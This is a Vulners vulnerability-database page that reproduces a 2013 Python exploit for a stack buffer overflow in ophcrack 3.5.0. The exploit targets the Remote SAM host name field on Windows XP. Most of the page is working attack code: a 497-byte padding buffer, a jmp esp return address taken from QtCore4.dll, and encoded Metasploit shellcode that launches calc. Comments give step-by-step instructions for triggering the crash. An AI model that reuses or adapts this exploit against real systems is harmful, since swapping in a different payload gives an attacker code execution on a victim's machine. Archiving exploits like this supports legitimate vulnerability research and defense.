Vulners
Lucene search
Ophcrack 3.5.0 - Code Execution Local Buffer Overflow
# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)
#!/usr/bin/python
#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x79\x78\x6c\x49\x57\x70"
"\x65\x50\x65\x50\x75\x30\x6e\x69\x7a\x45\x44\x71\x7a\x72\x75"
"\x34\x4e\x6b\x46\x32\x30\x30\x4e\x6b\x56\x32\x34\x4c\x4e\x6b"
"\x36\x32\x54\x54\x4e\x6b\x73\x42\x71\x38\x36\x6f\x48\x37\x32"
"\x6a\x36\x46\x75\x61\x69\x6f\x34\x71\x49\x50\x6e\x4c\x55\x6c"
"\x30\x61\x61\x6c\x45\x52\x44\x6c\x57\x50\x6f\x31\x78\x4f\x56"
"\x6d\x47\x71\x69\x57\x7a\x42\x6a\x50\x31\x42\x46\x37\x4e\x6b"
"\x71\x42\x66\x70\x6e\x6b\x43\x72\x35\x6c\x66\x61\x58\x50\x6e"
"\x6b\x37\x30\x54\x38\x6e\x65\x6f\x30\x31\x64\x53\x7a\x56\x61"
"\x4e\x30\x66\x30\x6e\x6b\x50\x48\x65\x48\x4e\x6b\x30\x58\x65"
"\x70\x46\x61\x7a\x73\x6a\x43\x35\x6c\x43\x79\x6e\x6b\x46\x54"
"\x6e\x6b\x75\x51\x7a\x76\x75\x61\x49\x6f\x66\x51\x6b\x70\x4c"
"\x6c\x49\x51\x68\x4f\x66\x6d\x77\x71\x48\x47\x44\x78\x6b\x50"
"\x62\x55\x7a\x54\x34\x43\x61\x6d\x4a\x58\x67\x4b\x53\x4d\x66"
"\x44\x71\x65\x49\x72\x72\x78\x6e\x6b\x73\x68\x44\x64\x53\x31"
"\x5a\x73\x43\x56\x6e\x6b\x54\x4c\x30\x4b\x4e\x6b\x73\x68\x35"
"\x4c\x56\x61\x4b\x63\x4c\x4b\x66\x64\x6c\x4b\x46\x61\x58\x50"
"\x4f\x79\x32\x64\x56\x44\x54\x64\x73\x6b\x63\x6b\x65\x31\x31"
"\x49\x72\x7a\x62\x71\x49\x6f\x69\x70\x62\x78\x31\x4f\x30\x5a"
"\x6c\x4b\x44\x52\x5a\x4b\x4b\x36\x51\x4d\x53\x5a\x67\x71\x6c"
"\x4d\x4b\x35\x78\x39\x75\x50\x35\x50\x45\x50\x42\x70\x30\x68"
"\x35\x61\x6e\x6b\x42\x4f\x4d\x57\x79\x6f\x69\x45\x4d\x6b\x6b"
"\x4e\x66\x6e\x54\x72\x59\x7a\x43\x58\x59\x36\x4d\x45\x6d\x6d"
"\x4f\x6d\x39\x6f\x5a\x75\x75\x6c\x34\x46\x73\x4c\x57\x7a\x6d"
"\x50\x4b\x4b\x49\x70\x61\x65\x44\x45\x4f\x4b\x61\x57\x74\x53"
"\x32\x52\x52\x4f\x31\x7a\x43\x30\x36\x33\x39\x6f\x49\x45\x50"
"\x63\x65\x31\x32\x4c\x63\x53\x43\x30\x41\x41")
#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]
jmp="\x36\x29\x2a\x6e"
buffer = "A"*497 + jmp + shellcode
print(buffer)
file = open('exploit.txt','w')
file.write(buffer)
file.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 May 2013 00:00Current
7.4High risk
Vulners AI Score7.4